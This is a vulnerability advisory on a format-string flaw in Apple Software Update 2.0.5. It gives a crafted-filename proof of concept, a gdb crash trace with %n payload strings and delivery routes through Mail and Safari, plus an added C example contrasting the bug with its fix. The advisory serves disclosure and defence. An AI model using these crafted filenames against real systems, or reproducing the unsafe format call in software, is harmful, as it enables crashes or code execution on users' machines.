Apple Software Update is used for delivering patches to end-users, such as the Apple Security Update 2007-001. It relies on the HTTP protocol for retrieving the files associated with each available patch, and handles the associated MIME type and the swutmp file extension.
Software Update fails to properly handle filename strings carrying the swutmp extension. It is affected by a typical format string vulnerability, which can lead to a denial of service condition or arbitrary
See the 'Exploitation conditions' section for more information.
This issue has been verified with Apple Software Update Version 2.0.5 (2.0.5) on Mac OS X 10.4.8 (8L2127).
Proof of concept, exploit or instructions to reproduce
The following is the most simple way to demonstrate this issue:
$ touch %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp
$ open %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp
See the 'Exploitation conditions' section for more information on different vectors to trigger the issue.
The following debugging information shows Software Update crashing when opening a file with a crafted filename:
(gdb) r
Starting program: /System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update
Reading symbols for shared libraries ....... done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x9326aea3
0x9000c0c1 in __vfprintf ()
(gdb) i r
eax            0x9326aea3      -1826181469
ecx            0x0             0
edx            0x0             0
ebx            0x9000ad62      -1879003806
esp            0xbfffd600      0xbfffd600
ebp            0xbfffdd58      0xbfffdd58
esi            0xbfffed4e      -1073746610
edi            0x25            37
eip            0x9000c0c1      0x9000c0c1 <__vfprintf+4976>
eflags         0x10282         66178
cs             0x17            23
ss             0x1f            31
ds             0x1f            31
es             0x1f            31
fs             0x0             0
gs             0x37            55
(gdb) back
#0  0x9000c0c1 in __vfprintf ()
#1  0x90100ea9 in snprintf_l ()
#2  0x908119d5 in _CFStringAppendFormatAndArgumentsAux ()
#3  0x9081091c in _CFStringCreateWithFormatAndArgumentsAux ()
#4  0x925daa5d in -[NSPlaceholderString initWithFormat:locale:arguments:] ()
#5  0x925fc670 in -[NSString initWithFormat:arguments:] ()
#6  0x9336056f in -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] ()
#7  0x934ac77a in _NXDoLocalRunAlertPanel ()
#8  0x93588ad6 in NSRunCriticalAlertPanel ()
#9  0x0000612a in ?? ()
(gdb) grep /s ThisIsEmbarrassing
Pattern found @ 0x1879433
0x1879433: "ThisIsEmbarrassing%n%n%n%#629AE"
Pattern found @ 0x3b792b
0x3b792b: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp??????\005"
Pattern found @ 0x3b7c6b
0x3b7c6b: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmpssing%25`????\a\001"
Pattern found @ 0x3b7cc4
0x3b7cc4: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp"
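The backtrace shows the sink: the crafted filename reaches NSRunCriticalAlertPanel and is consumed as a format string by vfprintf. The following is an added example, not Apple's code, reconstructing that bug shape in plain C next to its fixed form, plus a check a handler for downloaded or attached files could apply; all function names are hypothetical.

```c
/* Added example, not Apple's code: the format-string sink behind this advisory
 * reconstructed in plain C, its fixed form, and a defensive input check. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample input, modelled on the advisory's proof-of-concept name. */
static const char *CRAFTED_NAME = "%x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp";

/* Bug pattern: the filename is the *format* argument, so "%x" reads stack
 * words and "%n" writes memory. Never call this with untrusted input; it is
 * here only to show the shape the backtrace points at (the compiler warning
 * it triggers is exactly the one a build should treat as an error). */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int alert_message_vulnerable(char *out, size_t n, const char *filename) {
    return snprintf(out, n, filename);
}
#pragma GCC diagnostic pop

/* Fix: a constant format string; the filename is only ever a "%s" argument
 * (in Cocoa terms, a literal "%@" format with the NSString passed as data). */
int alert_message_fixed(char *out, size_t n, const char *filename) {
    return snprintf(out, n, "Could not process the file %s", filename);
}

/* Defensive check for a handler that receives file names from a download or
 * attachment: any '%' not doubled as "%%" starts a printf directive, and a
 * name built from them is a strong signal that a format-string sink is being
 * probed. Returns true when such a directive is present. */
bool has_format_directive(const char *name) {
    for (const char *p = strchr(name, '%'); p != NULL; p = strchr(p + 1, '%')) {
        if (p[1] == '%') {      /* "%%" is a literal percent sign: skip the pair */
            p++;
            continue;
        }
        return true;            /* "%x", "%n", "%25n" after decoding, a lone '%' */
    }
    return false;
}
```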
We are conducting further tests around Software Update and possible vectors to abuse this issue. So far, we have worked around Mail.app via a crafted attachment, 'pushing' Safari to download the file (which is downloaded to the user's Desktop folder automatically) by sending it as the associated MIME type, and obviously locally opening the file.
There are other potential methods to abuse it and thus this advisory might be updated whenever new details become available and tested.
Workaround or temporary solution
Wait for Apple to release a patch for Software Update via Software Update.
"Ah, #23 explains #22 a little. It almost seems like they're wording it so a crash could lead to a root shell in all cases." -- Someone who missed Sesame Street's "We Learn Reading with Duckie".